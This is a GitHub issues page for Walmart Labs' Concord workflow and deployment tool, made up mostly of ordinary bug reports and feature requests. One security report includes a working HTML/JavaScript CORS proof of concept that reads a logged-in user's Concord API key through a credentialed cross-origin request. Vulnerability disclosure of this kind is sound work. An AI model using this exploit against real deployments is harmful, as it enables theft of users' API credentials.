walmartlabs / concord Goto Github PK

Concord - workflow orchestration and continuous deployment management

Home Page: https://concord.walmartlabs.com

License: Other

Java 83.50% HTML 0.07% JavaScript 0.05% TypeScript 13.97% CSS 0.33% Dockerfile 0.05% Shell 0.08% Python 0.48% Groovy 0.01% Mustache 1.47%

ansible continuous-deployment workflow workflow-management-system

concord's People

Contributors

Stargazers

Watchers

Forkers

codyaverett richardmcsorley razwal tristindavis jvanzyl gauravlall ashikmohammed manojkumar16 7u4 satishrawat ivancamargo190 benhe119 mgobec prestonuscgvet vkentta yianjiajia padolan kmehta88 rakatashii jimmieclark simpligility ivcarrasc hsnrathore zhoupan suyambuganesh kolanot sleepyorion simhaonline mohib-hub ditto-workflow friederbluemle randgalt treym-wss brig smagill arun2803 chcheruk amithkb 700software muse-tester-lang muse-dev sakthimanoj junneyang 1507thakurabhi93 nidhisingh17 afsalva1 zone188 billmcchesney1 jcanizalez jayantiandhale n5ujn hirentamhane solomonalem ibodrov sphanda usi-devops ekmixon stackzombie dstvishnu classicvalues selvaraju samebang bellmit chrisbushman celestialized sanju918 queenscripts benbroadaway shradha-226 manithp ajayk agnewp alwaysjayaramsv dizhaung samruddhi362 huangyingting vraoj2ee erdarun joedragons waimart ox-w-lbs cdaringe eyalatox sambasallah platform-engineer supernihal ghas-results hmartyrossian shrashtike andyshahbazian citizenjosh ngwin-ab rohankumardubey java-popular-repos desaisharaddevops

concord's Issues

ConcordAuthenticatingFilter does not parse Bearer tokens correctly if they are prefixed with "Bearer "

Issue is here:

https://github.com/walmartlabs/concord/blob/master/server/impl/src/main/java/com/walmartlabs/concord/server/boot/filters/ConcordAuthenticatingFilter.java#L197

            if (h.startsWith(BEARER_AUTH_PREFIX)) {
                h = h.substring(BEARER_AUTH_PREFIX.length() + 1);
            }

The + 1 should be omitted. it chops off the first character of the token, and then you get this error response:

{"message":"Invalid API token: Last unit does not have enough valid bits"}

Example:

Test.java

import java.lang.*;

public class Test {
   private static final String BEARER_AUTH_PREFIX = "Bearer ";
   public static void main(String[] args) {
      String header = "Bearer FOOBAR";
      String substr = header.substring(BEARER_AUTH_PREFIX.length() + 1);
      System.out.println("substring = " + substr);
   }
}

$ javac Test.java && java Test
substring = OOBAR

Repository refresh optimizations

Quick explanation: Given multiple repository definitions within a single Project (different branches) and across Projects (same branch + different branches), the repository refresh task and API endpoint work less-than-optimally. This is compounded with higher number of repository definitions for a remote URL and greater git repo size.

Repo removed from cache when branch does not exist

Say there are there are three repos defined with the same git remote URL and different branches: my-repo:A ,my-repo:B, and my-repo:C. The branch for my-repo:B does not exist (e.g. someone tested something and forgot to remove it). The refresh process (on github event, or repo def modification) will go like this with a clean cache:

create local repo, fetch remote, checkout branch A
fail to checkout branch B, delete local repo
create local repo, fetch remote, checkout branch C

Possible solution: Don't delete recursively on unknown branch error.

All repo definitions refreshed individually, including duplicates

This one is trickier, and less of an issue if the previous issue is addressed. Say there are three Projects, each with the same repository defined my-repo:A. The refresh process will handle them all individually

concord/server/impl/src/main/java/com/walmartlabs/concord/server/org/project/RepositoryResourceV2.java

Line 64 in 46ea7f6

repositoryRefresher.refresh(repositoryIds);

This means the git operations for refreshing are repeated for each repo definition. The repo cache does help, assuming all of the defined repo branches exist.

Possible solution: A new refresh method that can coalesce on the repo URL + branch/commitID for the git operations, then update the relevant concord repo as needed.

Miscellaneous Ideas

GitHub events have a size (in KB) attribute. Perhaps we can leverage this to ignore background refreshing gigantic (threshold configurable in server.conf and/or policy).
Kill Switch: The ConcordSystem/concordTriggers/triggers repo can only disabled by doing it directly in the DB. There may be situations where disabling refreshing is desired or necessary. Perhaps it's worth having a slightly safer way of doing that?

How about the scalability and avaliablity of the system?

After serveral days of research and test, We feel concord is great. We are considering to use it in production for automatic CI&CD. I have a few questions so I‘d like to ask， thanks.

Is server and agent scalable and high avaliable？
I have intermediate data to persistent store and query，（fox exmaple: the deploy history of an app or the build image url), is concord plugin a good way to achive that?
Thannks again for any more tips of using concord.

Add a destroy action to the Terraform plugin

Having the ability to destroy resources with Terraform using the Concord plugin would be very useful. Our group would definitely like to use Concord for all Terraform operations.

Variables can not be interpolated into name fields.

For example:

- name: Validating client ${item.name}
  call: validate-client
  in:
    staticClient: ${item}
  withItems: ${clients}

Outputs Validating client ${item.name} instead of something like Validating client Foo

Additionally this seems to be inconsistent, as (at lease some) tasks seem to do this properly.

Implement masking secrets in the runner logs

Form inputs marked with "inputType: "password" are insecurely printed in the runner logs.

forms:
- vaultLdapPass: { label: "Vault Ldap Password:", type: "string?", inputType: "password", placeholder: "optional, type only if you want to change Vault Ldap Password" }

configuration:
runner:
logLevel: "WARN"
events:
recordTaskInVars: false
inVarsBlacklist:
- "vaultLdapPass"

flows:
vaultSecretReset:
- form: vaultSecretReset
yield: true
- call: runDocker
in:
dockerCmd: |
echo token=${vaultSecretReset.vaultLdapPass} >> mysecretfile

log output contains:

23:34:13 [WARN ] call ['docker......
echo token=testtoken >> mysecretfile

where vaultLdapPass was set value "testtoken" in the secured form input.

Plans for 2.0

remove deprecated features (see #42)
drop Java 8 support, move to Java 11
drop Nashorn, move to GraalVM JavaScript
remove support for JS templates (or move it into a server plugin)
use runtime: concord-v2 by default?
PG 11?
migrate to https://github.com/openapi-tools/swagger-maven-plugin

"Illegal reflective access" warnings on Java 11

When starting the server or running a process using Java 11:

WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by com.google.inject.internal.cglib.core.$ReflectUtils$1 (file:/home/ibodrov/bin/concord) to method java.lang.ClassLoader.defineClass(java.lang.String,byte[],int,int,java.security.ProtectionDomain)
WARNING: Please consider reporting this to the maintainers of com.google.inject.internal.cglib.core.$ReflectUtils$1

Update to the latest Guice when google/guice@85e30be is released.

VariablesSnapshotListener - Can't save a snapshot of the process variables

An error "Save snapshot failed" happens before my flow finish. DeployAppInfo is a java class defined in my plugin.

The parent process report an error like below.

The child process report an error like below.

ansible: the runtime-v1 version shouldn't use v2 types

Currently the task re-uses TaskResult from the concord-v2 runtime for the common code that can be called from both v1 and v2 runtimes. Due to breaking changes in 1.71.0, this might cause errors like so:

java.lang.InstantiationError: com.walmartlabs.concord.runtime.v2.sdk.TaskResult
	at com.walmartlabs.concord.plugins.ansible.AnsibleTask.run(AnsibleTask.java:153)
	at com.walmartlabs.concord.plugins.ansible.v1.RunPlaybookTask2.run(RunPlaybookTask2.java:127)

We need to change the task to not to use v2 types in common code bits and avoid situations like this in future.

Processes stuck in SUSPENDED after releasing lock when using parallel

We have processes stuck in SUSPENDED state when waiting lock is released. Having flows (v2):

flows:
  lockParent:
    - parallel:
        - call: lockChild1
        - call: lockChild2
  lockChild1:
    - task: lock
      in:
        name: Lock1
        scope: PROJECT
    - ${sleep.ms(30000)}
    - task: unlock
      in:
        name: Lock1
        scope: Project
  lockChild2:
    - task: lock
      in:
        name: Lock2
        scope: PROJECT
    - ${sleep.ms(30000)}
    - task: unlock
      in:
        name: Lock2
        scope: Project

When running lockParent flow twice in parallel (within 30 seconds):

First process acquires both locks
Second process suspends on both locks
First process releases locks
Second process acquires first lock, but never never acquires second lock
As a result second lock is stuck in SUSPENDED state, process_locks table in DB is empty.

Reporting a Security Vulnerability

Hello!

What would be the best way for me to submit a security issue? I'd prefer to send it privately instead of a GitHub issue, if possible.

Console Docker image crashes 'No such file or directory'

After building the docker images I get this error. It would seem the conf files are not being installed on build.

nginx: [emerg] open() "/opt/concord/console/nginx/app.conf" failed (2: No such file or directory) in /opt/concord/console/nginx/nginx.conf:48

These mounts seem to fix the issue:

    volumes:
      - ./docker-images/console/src/main/docker/nginx/nginx.conf:/opt/concord/console/nginx/nginx.conf
      - ./docker-images/console.conf:/opt/concord/console/nginx/app.conf

Expression steps have unnecessary drawers.

When adding a step that is purely an expression (expr: ${...} or ${...}) a log drawer gets created with the default name expression even if there is no output. These clutter up the log and provide no real information.

Plans for splitting up PROCESS_QUEUE table

We need to split the PROCESS_QUEUE table up.

In order to do that we need to plan some changes across several releases.

Here's the approximate plan:

release 1.63.0:
- create a new PROCESS_STATUS table:
  - INSTANCE_ID
  - CREATED_AT
  - CURRENT_STATUS
  - LAST_UPDATED_AT
- create necessary indicies;
- create a trigger to fill PROCESS_STATUS table in.
release (+ 1 month from 1.63.0):
- drop the trigger;
- make PROCESS_QUEUE.CURRENT_STATUS and LAST_UPDATED_AT nullable, stop using those columns in the code;
- (optionally) drop PROCESS_QUEUE.CURRENT_STATUS and LAST_UPDATED_AT columns.

Timestamp resolution

Currently, the API returns timestamps with millisecond resolution (0.999) while the DB stores timestamps with microseconds (0.999999). This may cause inconsistencies for some queries, e.g.

DB value: 2021-06-30T18:32:06.561333-04
DB value received as an API object: 2021-06-30T18:32:06.561-04

We need to choose:

truncate the timestamps before inserting into the DB;
or extend the API timestamp resolution to microseconds.

Truncating before insert requires updating the existing data otherwise the queries with CREATED_AT may fail (e.g. all queries that are using tables partitioned by INSTANCE_ID + CREATED_AT. Which might not be practical for large Concord installations.

Increasing the timestamp resolution in the API can potentially break some 3rd-party clients, e.g. clients that parse ISO 8601 / RFC 3336 expecting only millisecond precision.

docker-task: broken runtime-v2 stderr capture

stderr output capturing is broken in DockerTaskV2. The main issue is that stdout and stderr are combined by default`

concord/plugins/tasks/docker/src/main/java/com/walmartlabs/concord/plugins/docker/DockerTaskV2.java

Line 60 in 228b212

boolean logOutput = input.getBoolean(LOG_OUTPUT_KEY, true);

Then, when using logOutput: false, the output isn't combined...but it also isn't captured at all

concord/plugins/tasks/docker/src/main/java/com/walmartlabs/concord/plugins/docker/DockerTaskV2.java

Lines 80 to 85 in 228b212

    
           int code = dockerService.start(spec, 
        
                   logOutput ? line -> processLog.info("DOCKER: {}", line) : null, 
        
                   logOutput ? line -> { 
        
                       stdErr.append(line).append("\n"); 
        
                       processLog.info("DOCKER: {}", line); 
        
                   } : null);

Possible stale workDir references after resuming a process

The workDir value changes between executions (including resuming of suspended processes).
If a process saves the current ${workDir} value in a variable, it might end up with a "stale" value.

E.g.

imports:
  - git:
      url: "https://github.com/walmartlabs/concord.git"
      version: "master"
      path: "examples/hello_world"
      dest: "my_stuff"

configuration:
  arguments:
    pathToAFile: "${workDir}/my_stuff/concord.yml"
      
flows:
 default:
   - expr: ${resource.asYaml(pathToAFile)}
   
   - form: myForm
     yield: true
     fields:
       - x: { type: string }
   
   - expr: ${resource.asYaml(pathToAFile)}

Steps to reproduce locally:

start the concord.yml from the example above;
wait for the process to suspend;
submit the form.

Expected result:

the process can read pathToAFile

Actual result:

19:08:59 [WARN ] eval ['${resource.asYaml(pathToAFile)}'] -> error: java.nio.file.NoSuchFileException: /tmp/prefork8429794436487714772/payload/my_stuff/concord.yml
19:08:59 [ERROR] main -> unhandled exception
java.nio.file.NoSuchFileException: /tmp/prefork8429794436487714772/payload/my_stuff/concord.yml

Affects both v1 and v2 runtimes.

OnCancel flow can not access some variables of parent process

Tag: 1.33.0, Running the default flow above, I canceled the process while sleeping and trigger the OnCancel flow. But It seems OnCancel flow can not access variables set while parent running.I got an error below. (OnFailure flow is correct, i can print the variable.)

Got an error "ELResolver cannot handle a null base Object with identifier" when developing task plugin

step1. I implemented Task interface and created my plugin "zajenkins" in package "com.za.tech.concord.plugins.jenkins".

@Named("zajenkins")
public class ZaJenkinsTask implements Task {...}

step2. I created a flow calling the task and run it.

configuration:
  dependencies:
#  - mvn://com.walmartlabs.concord.plugins:jenkins-task:1.11.0
  - http://10.139.32.180:8080/nexus/content/repositories/snapshots/com/za/tech/concord/plugin/jenkins/1.0-SNAPSHOT/jenkins-1.0-20190710.033237-4-sources.jar
  entryPoint: "default"
flows:
  default:
  - task: zajenkins
    in:
      baseUrl: "http://172.28.155.241:8081"
      username: "za-zhaogang"
......

step3. I got an error "ELResolver cannot handle a null base Object with identifier 'zajenkins".

Custom python package

Hi, is it possible to use a custom python package when using concord, e.g. passing a local location on laptop or a git repo on internal walmart network that contains a wheel file for concord to install on the instances for a job?

Majority of data science pipelines have this functionality, it will remove duplications in code, and simplify the file list in yml file as well (instead of many files, we can pass an entry script).

Deprecated features

A tracking issue for all deprecated issues. For "2.0 proper" we might want to remove some (or all) of those:

concord-server:
- the Inventory API - replaced with the JSON Store API
- everything in com.walmartlabs.concord.server.ansible
- DefaultProcessConfiguration - replaced with the defaultProcessCfg policy
- ProcessPortalService
- all those ProcessResource#start methods that are not multipart/form-data requests
- ProjectEntry#acceptsRawPayload
- deprecated methods in ProcessAnsibleResource.

Is a jvm process started per pipeline or request?

After a performance test with 1 CPU and 2GB RAM agent and server per pod, we found the server can handle 100 request per second. But the requests are async queued and the real execution of workflow takes seconds. Therefore the system can only execute and finish 500 tasks one hour( a simple print helloworld task). I think its a little slow for us ( or my configuration setting is wrong?).

I'm trying to find some ways to optimize the speed. Before that, i'd like to make sure is a jvm process started per request? As i know, preparing and start a jvm process takes seconds of time, for what sake is this design made. If i set one jvm and one repo to execute multi pipeline at the same time, is that feasible？

Thanks a lot.

Failed Dependency transfer merely logs

When a dependency transfer fails the system merely logs it. It should also post some kind of event or other notice so that downstream plugins can take action.

concord/dependency-manager/src/main/java/com/walmartlabs/concord/dependencymanager/DependencyManager.java

Line 300 in 97fbce2

log.error("transferFailed -> {}", event);

UTF-8 arguments is garbled when calling /api/v1/process(multipart/form-data)

When calling start process api with UTF-8 arguments except ascii, the arguments in form-data(arguments.xxx) will be transformed to a strange string（hex: efbfbdefbfbdefbfbd）. Similar to this question
https://stackoverflow.com/questions/14683677/how-to-set-encoding-in-resteasy-to-utf-8.

I add a filter and solved the problem.

        request.setAttribute(InputPart.DEFAULT_CHARSET_PROPERTY, "UTF-8");

Maybe you will have better solutions.

Concord proccess fails to run docker container- error during connect

Concord processes that trys to run a docker containers always fail with error:

error during connect: Post http://dind:2375/v1.24/images/create?fromImage=alpine&tag=latest: dial tcp: lookup dind on 127.0.0.11:53: no such host

Concord file is using the provided docker example

flows:
  default:
    - docker: library/alpine
      cmd: echo '${greeting}'

configuration:
  arguments:
    greeting: "Hello, world!"

I first noticed this behavior trying to run custom ansible docker images but have been able to repro the same error with simple docker tasks.

Concord is installed using the provided docker-compose step.

I have experienced the same error on multiple different Linux virtual machines running latest concord server version.

Ubuntu 20.04
Docker version 20.10.5, build 55c4c88
docker-compose version 1.28.6, build 5db8d86f

also tested with:
Docker version 19.03.8, build afacb8b7f0
docker-compose version 1.29.1, build c34c88b2

Full Proccess Log

23:10:45 [INFO ] Process state download took 17ms
23:10:45 [INFO ] Runtime: concord-v1
23:10:45 [INFO ] Resolving process dependencies...
23:10:45 [INFO ] Dependencies: 
	mvn://com.walmartlabs.concord.plugins.basic:concord-tasks:1.84.0
	mvn://com.walmartlabs.concord.plugins.basic:slack-tasks:1.84.0
	mvn://com.walmartlabs.concord.plugins.basic:http-tasks:1.84.0
23:10:49 [INFO ] Process status: RUNNING
23:10:50 DOCKER: Using default tag: latest
23:10:50 DOCKER: error during connect: Post http://dind:2375/v1.24/images/create?fromImage=alpine&tag=latest: dial tcp: lookup dind on 127.0.0.11:53: no such host
23:10:50 [WARN ] call ['library/alpine', 'echo 'Hello, world!'', '/tmp/concord-agent/workDirs/dce8c137-c194-4dc3-a4d8-d092a170dbcf'] -> finished with code 1
23:10:50 [ERROR] main -> unhandled exception
java.lang.RuntimeException: Docker process finished with with exit code 1
	at com.walmartlabs.concord.plugins.docker.DockerTask.execute(DockerTask.java:108)
	at com.walmartlabs.concord.runner.TaskCallInterceptor.invoke(TaskCallInterceptor.java:64)
	at com.walmartlabs.concord.runner.engine.EngineFactory$JavaDelegateHandlerImpl.execute(EngineFactory.java:215)
	at io.takari.bpm.reducers.ExpressionsReducer$DelegateFn.call(ExpressionsReducer.java:131)
	at io.takari.bpm.reducers.ExpressionsReducer$DelegateFn.call(ExpressionsReducer.java:1)
	at io.takari.bpm.reducers.ExpressionsReducer.reduce(ExpressionsReducer.java:66)
	at io.takari.bpm.reducers.CombiningReducer.reduce(CombiningReducer.java:18)
	at io.takari.bpm.DefaultExecutor.eval(DefaultExecutor.java:61)
	at io.takari.bpm.AbstractEngine.runLockSafe(AbstractEngine.java:209)
	at io.takari.bpm.AbstractEngine.start(AbstractEngine.java:69)
	at com.walmartlabs.concord.runner.Main.start(Main.java:281)
	at com.walmartlabs.concord.runner.Main.executeProcess(Main.java:170)
	at com.walmartlabs.concord.runner.Main.run(Main.java:142)
	at com.walmartlabs.concord.runner.Main.main(Main.java:495)
23:10:51 [ERROR] Process exit code: 1
23:10:51 [INFO ] Process status: FAILED

container agent could not connect to server via websocket

I built docker containers following the doc [https://concord.walmartlabs.com/docs/getting-started/install/docker.html].
Everything works well except the agent. I got a "connect to server refused" error.

I can login to the console and create my project and run， but the agent process did not work as expected. Attach to the agent container, I found config file "/opt/concord/agent/default.conf" is empty, is that right？

Defending against duplicate plugin entries

If you have something like the following where you accidentally list a plugin twice:

  dependencies:
    - "mvn://ca.vanzyl.concord.plugins:concord-k8s-plugin:0.0.1-SNAPSHOT"
    - "mvn://com.walmartlabs.concord.plugins:terraform-task:1.16.0"
    - "mvn://com.walmartlabs.concord.plugins:git:1.16.0"
    - "mvn://com.walmartlabs.concord.plugins:terraform-task:1.19.1"

We might want to warn or probably just fail fast and now allow it. Not sure how the plugin retriever or plugin classloader works but if can allow the random ordering of the plugins and how they are loaded it might lead to unexpected results.

Misconfigured CORS allows a malicious user to fetch api keys

Just a security issue I noticed where the accepted origins on CORS appear to be vulnerable.

If an authenticated user visits a page such as the following, the VICTIMSKEY is alerted. This could also be sent to an attacker.

<html>
   <head>
      <script>
         function cors() {
            var xhttp = new XMLHttpRequest();
                xhttp.onreadystatechange = function() {
                    if (this.readyState == 4 && this.status == 200) {
                        document.getElementById("emo").innerHTML = alert(this.responseText);
            }
         };
         xhttp.open("GET", "https://concord.endpoint.com/api/v1/apikey", true);
         xhttp.withCredentials = true;
         xhttp.send();
         }
      </script>
   </head>
   <body>
      <center>
      <h2>CORS PoC Exploit </h2>
      <h3>Show full content of page</h3>
      <div id="demo">
         <button type="button" onclick="cors()">Exploit</button>
      </div>
   </body>
</html>

runtime-v2: incorrect events configuration merging with profiles

Event recording configuration gets wiped out if an active profile is set.

For example:

configuration:
  events:
    recordTaskInVars: true

profiles:
  myProfile:
    arguments:
      myString: hello

If myProfile is active, the events setting is not respected. Interestingly, the merged config (e.g. _main.json in process state) does contain the expected events configuration

Concord-v2 runtime: custom form value injection not working as intended

Arbitrary values are not parsed and made available in a custom form values property.
Thus I had to work around and smuggle my object in a form value directly then parse the JSON value from a string.

e.g.
Dynamic form definition

data.js received

SecretsManager needs a createOrUpdate method

We're currently using SecretManager.createBinaryData - what we really need is SecretManager.createOrUpdateBinaryData. We're using SecretManager as a secure storage mechanism only so key recovery isn't an issue. We want to be able to set a secret referenced by name whether it exists or not.

com.walmartlabs.concord.ApiException: Process instance not found

When using ConcordRuleBase during tests in REMOTE mode our test is flaky due to occasionally receiveing such error:

com.walmartlabs.concord.ApiException: (http://localhost:8001) Server response: Process instance not found
	at com.walmartlabs.concord.ApiClient.handleResponse(ApiClient.java:964)
	at com.walmartlabs.concord.ApiClient.execute(ApiClient.java:852)
	at com.walmartlabs.concord.client.ProcessV2Api.getWithHttpInfo(ProcessV2Api.java:341)
	at com.walmartlabs.concord.client.ProcessV2Api.get(ProcessV2Api.java:326)
	at ca.ibodrov.concord.testcontainers.ConcordProcess.lambda$0(ConcordProcess.java:86)
	at ca.ibodrov.concord.testcontainers.ConcordProcess.waitForStatus(ConcordProcess.java:231)
	at ca.ibodrov.concord.testcontainers.ConcordProcess.waitForStatus(ConcordProcess.java:86)

This is in a very early stage of Test in such code context.

MiddlewareResponse middlewareResponse =
        middlewareClient.createClusterDeployment(createRequest, ProvisioningMode.all);
assertThat(middlewareResponse.status()).isEqualTo(200);
assertThat(middlewareResponse.processId()).isNotNull(); 
if (waitForProcess) {
    ConcordProcess process = new Processes(apiClient).get(middlewareResponse.processId());
    ProcessEntry pe = process.waitForStatus(ProcessEntry.StatusEnum.FINISHED);
    assertThat(pe.getStatus()).isEqualTo(ProcessEntry.StatusEnum.FINISHED);
}

Steps:

We execute REST API call to middleware.
Middleware converts request to Concord Process payload and submits process.
Receives Process ID from Concord API response.
Process ID is returned in middleware REST API response
client uses process id to check process status via Processes testcontainers wrapper.
Concord API response is no process found

This issue is flaky.

Feature: Log information when input argument is being overwritten

Once we pass flow arguments using _main.json they might override predefined argument within flow. In such cases it would be super helpful if we would get a Warning or Info lvl. message about that.

Allow the workDir to be preserved for debugging

As pointed out by @ibodrov a small change can be made here:

https://github.com/walmartlabs/concord/blob/master/agent/src/main/java/com/walmartlabs/concord/agent/executors/runner/RunnerJobExecutor.java#L201

To allow the preservation of the workDir if you want to examine its contents while working on a flow.

bug: inventory api create query consumes wrong content-type

Code:

@Consumes(MediaType.APPLICATION_JSON)

Documentation:

Headers Authorization, Content-Type: text/plain

Results in getting a 415 error when setting the content type to text/plain as documented.
If you set the content-type header to application/json it works; even though the content provided is a SQL query and not valid JSON.

Seems this was a regression during change-over to JSONStore

Kerberos auth is broken in nested containers.

Kinit occurs in the parent container:

16:00:20 [INFO ] TGT obtained, expired at 'Thu Oct 01 07:00:20 UTC 2020'
16:00:20 [INFO ] TGT renew at Thu Oct 01 06:59:20 UTC 2020
16:00:21 ANSIBLE: latest: Pulling from walmartlabs/concord-ansible/ansible-docker-pymssql-pyodbc
16:00:21 ANSIBLE: 3c72a8ed6814: Pulling fs layer
16:00:21 ANSIBLE: 46bc21ec4861: Pulling fs layer
16:00:21 ANSIBLE: 3b889782b0ff: Pulling fs layer

KRB5CCNAME gets dropped in a directory not available in the child container: https://github.com/walmartlabs/concord/blob/master/plugins/tasks/ansible/src/main/java/com/walmartlabs/concord/plugins/ansible/KerberosAuth.java#L70

No Kerberos credentials available (default cache: /tmp/concord/prefork6456798604649317788/payload/.concord_tmp/ansible4533715454010284806/tgt-ticket)

Should the krb5 ticket cache be located in workdir like Private Keys (with similar cleanup)?
Should we just mount through the tempDir to the child? Potentially to a different location and re-set KRB5CCNAME?

How to init different configs while processing different flows?

I have two flows and its configurations defined in the concord directory like below.
concord.yml

flows:
  flow1:
  - log: "thisIsFlow1 ${arg1}"
 flow2:
  - log: "thisIsFlow2 ${arg2}"

concord/flow1.yml

configuration:
  arguments:
    arg1: ${arg1}

concord/flow2.yml

configuration:
  arguments:
    arg2: ${arg2}

Now when i call /api/v1/process flow1 with arg1, i'll get an error "ELResolver cannot handle a null base Object with identifier 'arg2'" warning me to put parameter arg2 in request.

I want to just init arg1 when i call flow1, just init arg2 when i call flow2. The resources and profiles features seems to be a share of configs, it didn't solve my problem. How could i do that?

Conditions in generic triggers

We need to document the security requirements for calling trigger endpoints.
The issue below is invalid, it is the expected behaviour of runtime: concord-v1. The original problem was causes by the lack of permissions for the project.

Original description:

Assuming the default server configuration and a concord.yml like so

triggers:
  - my_trigger:
      entryPoint: default
      conditions:
        a_field: a_value

flows:
  default:
    - log: "Hello!"

It produces the following trigger:

Note the nested conditions.

To activate this trigger, I would need to include the conditions field in the payload too:

{
    "conditions": {
        "a_field": "a_value"
    }
}

Which is different from the logic of other trigger types, the conditions field's content should be used for matching and not the top-level fields in the trigger.

Runner Logging level does not affect logs output

Runner logging level is set as "WARN", but the logs is full of "INFO" level messages.

configuration:
runner:
logLevel: "WARN"

Logs:

09:55:42 [INFO ] Storing policy '[concord-base, default-variables]' data
09:55:42 [INFO ] Copying the repository's data: https://.........
feature/ssl-offset-reset:head, path: /kafka-offset-reset-service
09:55:43 [INFO ] Using entry point: startResetOffset
09:55:43 [INFO ] Applying policies...
09:55:43 [INFO ] Storing default dependency versions...
09:55:43 [INFO ] Enqueued. Waiting for an agent (requirements={agent={flavor=large}})...
09:55:44 [INFO ] Acquired by: Concord-Agent: id: ff119787-3336-5687-8df2-e0d27e738a68 /devtools/concord-prod0/prod0/bom/agent-large-cent76/1 @ p
09:55:44 [INFO ] Exporting the repository data: ....... @ feature/ssl-offset-reset:0dd9b935ef01acdb851cc1c7a469f7d3c4e1fb7e, path: /kafka-offset-reset-service
09:55:45 [INFO ] Repository data export took 509ms
09:55:45 [INFO ] Downloading the process state...
09:55:45 [INFO ] Process state download took 58ms
09:55:45 [INFO ] Runtime: concord-v1
09:55:45 [INFO ] Resolving process dependencies...
09:55:45 [INFO ] Checking the dependency policy...
09:55:45 [INFO ] Dependencies:
mvn://com.walmartlabs.concord.plugins.basic:concord-tasks:1.79.1
mvn://com.walmartlabs.concord.plugins.basic:slack-tasks:1.79.1
mvn://com.walmartlabs.concord.plugins.basic:http-tasks:1.79.1
09:55:52 [INFO ] Process status: RUNNING
09:55:53 [INFO ] Process finished with: 0

concord-task: broken runtime-v2 methods/actions

`suspendForCompletion()`

concord/plugins/tasks/concord/src/main/java/com/walmartlabs/concord/client/v2/ConcordTaskV2.java

Lines 83 to 87 in 228b212

    
           public void suspendForCompletion(List<String> ids) throws Exception { 
        
               delegate().suspendForCompletion(ids.stream() 
        
                       .map(UUID::fromString) 
        
                       .collect(Collectors.toList())); 
        
           }

The task is not actually suspending the process. It just continues on.

process info not returned when using `sync: true`

In the runtime-v1 implementation, the final process status info is returned/set--not just the process IDs. We need to return similar data, or update the docs to indicate that's not how it works and concord.waitForCompletion(...) needs to be called afterwards (though that makes less sense).

returning UUIDs for process IDs only accepting Strings

The start and fork actions return process IDs as UUID objects. Other methods for checking the status like waitForCompletion expect the given IDs to be Strings. So you cannot currently do a couple simple calls like

- task: concord
  in:
    sync: false
    # ...
  out: result  # only contains ids
- expr: ${concord.waitForCompletion(result.ids)}
  out: processResults

# results in
# [ERROR] (concord.yml): Error @ line: 183, col: 7. java.util.UUID cannot be cast to java.lang.String

Instead, you have to do an extra step of toString()-ing the UUIDs

- task: concord
  in:
    sync: true
    suspend: true
    ...
  out: result  # only contains ids
# converts UUID ids to String first
- expr: ${concord.waitForCompletion(result.ids.stream().map(id -> id.toString()).toList())}
  out: processResults

The plugin should be more careful with the

`id` vs `ids` when forks count is 1 vs more than 1

The returned data when using the fork action varies depending on the number of forks.

- task: concord
  in:
    action: fork
    forks:
    - entryPoint: flowA
  out: result  # just one fork gives result.id

- task: concord
  in:
    action: fork
    forks:
    - entryPoint: flowA
    - entryPoint: flowB
  out: result  # multiple forks gives result.ids

This should be more consistent. I think it should always return ids when forking.

Improve warning if plugin may be incompatible

We are using concord 1.70.1 release with the concord-v2 runtime and tried using a newer version of the ansible plugin (1.72.0) which isn't 100% compatible with the 1.70.1 runtime.

The ansible plugin still applied the playbook to our server before the error was thrown and it was not apparent to us that the plugin version we chose was not supported by the runtime. Thus it would be useful for a plugin to be able to specify a minimum runtime and alert us if that minimum requirement is not met.

e.g.

# custom flow, calls the ansible task with some default params
  - call: ansible-playbook  
     in:
       playbook: deploy
       extraVars:
         projectName: ${projectName}
         version: ${version}
     error:
       # False negatives would be caught here
       - log: ${lastError}

12:37:41 [INFO ] Dependencies: 
	mvn://com.walmartlabs.concord.plugins.basic:concord-tasks:1.70.1
	mvn://com.walmartlabs.concord.plugins.basic:slack-tasks:1.70.1
	mvn://com.walmartlabs.concord.plugins.basic:http-tasks:1.70.1
	mvn://com.walmartlabs.concord.plugins.basic:ansible-tasks:1.72.0
12:37:47 [INFO ] Process status: RUNNING
12:37:54 [WARN ] java.lang.RuntimeException: java.lang.NoSuchMethodError: com.walmartlabs.concord.runtime.v2.sdk.TaskResult.of(Z)Lcom/walmartlabs/concord/runtime/v2/sdk/TaskResult$SimpleResult;
12:37:54 [WARN ] 	at com.walmartlabs.concord.runtime.v2.runner.logging.SegmentedLogger.executeInThreadGroup(SegmentedLogger.java:113)

How can I create a admin user

I'm able to set up all the components in by laptop but unable to have an admin user. Is there any documentation on this?

feature: normalize username/userDomain from LDAP Realm before inserting into users table

concord/server/impl/src/main/java/com/walmartlabs/concord/server/user/UserDao.java

Line 180 in 245b41f

.where(USERS.USERNAME.eq(username));

concord/server/impl/src/main/java/com/walmartlabs/concord/server/user/UserDao.java

Line 183 in 245b41f

q.and(USERS.DOMAIN.eq(userDomain));

Creating api keys fails with 500 Internal Server Error: User not found when providing a request

{
  "username": "foo",
  "userDomain": "example.com",
  "userType": "LDAP"
}

When looking up the user using /api/service/console/whoami they come back as

{ "realm": "ldap", "username": "foo", "userDomain": "Example.com" }

The domain field in the users table has inconsistent case, so normalizing client-side can't be done.

When looking up a user (in LDAP specifically) [email protected] and [email protected] are the same user in the same domain, and so they should match. This means either there needs to be some special code for case-insensitive lookup, or data in the users table should be normalized.

As far as I can tell, LDAP DN/Attrs are case-insensitive by default: https://ldapwiki.com/wiki/Distinguished%20Name%20Case%20Sensitivity

I think it would be preferable to normalize the username and userDomain field before inserting from LDAP to mitigate a related issue where two entries for the same account may get inserted.

leading to this error:

java.lang.IllegalArgumentException: Non unique results found for username: 'foo', domain: 'null', type: LDAP

Invalid SSL Certificate for concord.walmartlabs.com

When trying to reach the project homepage (concord.walmartlabs.com) an Invalid SSL Certificate error is thrown.

Can i optimize memory usage of agent?

After a concurrent test and learning the source code, i found that one workflow instance would take 128M memory and create a JVM process.

Considering we have ten thousands of projects to build everyday, and one workflow may last 10 minutes or more（doing some performance test）, we need 50~100G of memory. I think walmart will need much more.

I'd like to know is that expected, or is there any method to optimize resource usage?

Concord doesn't work with JDK 16

> java --version
openjdk 16 2021-03-16
OpenJDK Runtime Environment Zulu16.28+11-CA (build 16+36)
OpenJDK 64-Bit Server VM Zulu16.28+11-CA (build 16+36, mixed mode, sharing)

> concord run                                                                                                                                                                                                 Copying files into the target directory...
Starting...
com.google.common.util.concurrent.UncheckedExecutionException: java.lang.IllegalStateException: Unable to load cache item
        at com.google.common.cache.LocalCache$Segment.get(LocalCache.java:2050)
